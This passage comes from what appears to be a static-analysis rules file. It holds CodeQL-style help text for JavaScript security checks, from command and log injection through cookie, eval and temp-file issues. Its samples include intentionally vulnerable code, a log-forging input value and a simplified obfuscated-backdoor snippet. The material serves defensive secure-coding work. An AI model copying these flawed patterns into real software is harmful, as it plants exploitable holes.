injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: 
[CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. 
For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: 
[CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Forwarding command-line arguments to a child process\n executed within a shell may indirectly introduce\n command-line injection vulnerabilities.", + "id" : "js/indirect-command-line-injection", + "kind" : "path-problem", + "name" : "Indirect uncontrolled command line", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/log-injection", + "name" : "js/log-injection", + "shortDescription" : { + "text" : "Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. 
Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n", + "markdown" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is 
displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## 
References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/log-injection", + "kind" : "path-problem", + "name" : "Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/password-in-configuration-file", + "name" : "js/password-in-configuration-file", + "shortDescription" : { + "text" : "Password in configuration file" + }, + "fullDescription" : { + "text" : "Storing unencrypted passwords in configuration files is unsafe." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n", + "markdown" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. 
Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-256", "external/cwe/cwe-260", "external/cwe/cwe-313", "external/cwe/cwe-522" ], + "description" : "Storing unencrypted passwords in configuration files is unsafe.", + "id" : "js/password-in-configuration-file", + "kind" : "problem", + "name" : "Password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/empty-password-in-configuration-file", + "name" : "js/empty-password-in-configuration-file", + "shortDescription" : { + "text" : "Empty password in configuration file" + }, + "fullDescription" : { + "text" : "Failing to set a password reduces the security of your code." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n", + "markdown" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-258", "external/cwe/cwe-862" ], + "description" : "Failing to set a password reduces the security of your code.", + "id" : "js/empty-password-in-configuration-file", + "kind" : "problem", + "name" : "Empty password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/hardcoded-data-interpreted-as-code", + "name" : "js/hardcoded-data-interpreted-as-code", + "shortDescription" : { + "text" : "Hard-coded data interpreted as code" + }, + "fullDescription" : { + "text" : "Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. 
The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n", + "markdown" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. 
The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-506" ], + "description" : "Transforming hard-coded data (such as hexadecimal constants) into code\n to be executed is a technique often associated with backdoors and should\n be avoided.", + "id" : "js/hardcoded-data-interpreted-as-code", + "kind" : "path-problem", + "name" : "Hard-coded data interpreted as code", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/user-controlled-bypass", + "name" : "js/user-controlled-bypass", + "shortDescription" : { + "text" : "User-controlled bypass of security check" + }, + "fullDescription" : { + "text" : "Conditions that the user controls are not suited for making security-related decisions." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. 
Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n", + "markdown" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. 
If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... 
show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-807", "external/cwe/cwe-290" ], + "description" : "Conditions that the user controls are not suited for making security-related decisions.", + "id" : "js/user-controlled-bypass", + "kind" : "path-problem", + "name" : "User-controlled bypass of security check", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/unsafe-code-construction", + "name" : "js/unsafe-code-construction", + "shortDescription" : { + "text" : "Unsafe code constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. 
If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. 
If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using externally controlled strings to construct code may allow a malicious\n user to execute arbitrary code.", + "id" : "js/unsafe-code-construction", + "kind" : "path-problem", + "name" : "Unsafe code constructed from library input", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/samesite-none-cookie", + "name" : "js/samesite-none-cookie", + "shortDescription" : { + "text" : "Sensitive cookie without SameSite restrictions" + }, + "fullDescription" : { + "text" : "Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request 
Forgery (CSRF) attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n", + "markdown" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1275" ], + "description" : "Sensitive cookies where the SameSite attribute is set to \"None\" can\n in some cases allow for Cross-Site Request Forgery (CSRF) attacks.", + "id" : "js/samesite-none-cookie", + "kind" : "problem", + "name" : "Sensitive cookie without SameSite restrictions", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/file-system-race", + "name" : "js/file-system-race", + "shortDescription" : { + "text" : "Potential file system race condition" + }, + "fullDescription" : { + "text" : "Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. 
These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. 
Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n", + "markdown" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to 
time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-367" ], + "description" : "Separately checking the state of a file before operating\n on it may allow an attacker to modify the file between\n the two operations.", + "id" : "js/file-system-race", + "kind" : "problem", + "name" : "Potential file system race condition", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.7" + } + }, { + "id" : "js/insecure-temporary-file", + "name" : "js/insecure-temporary-file", + "shortDescription" : { + "text" : "Insecure temporary file" + }, + "fullDescription" : { + "text" : "Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. 
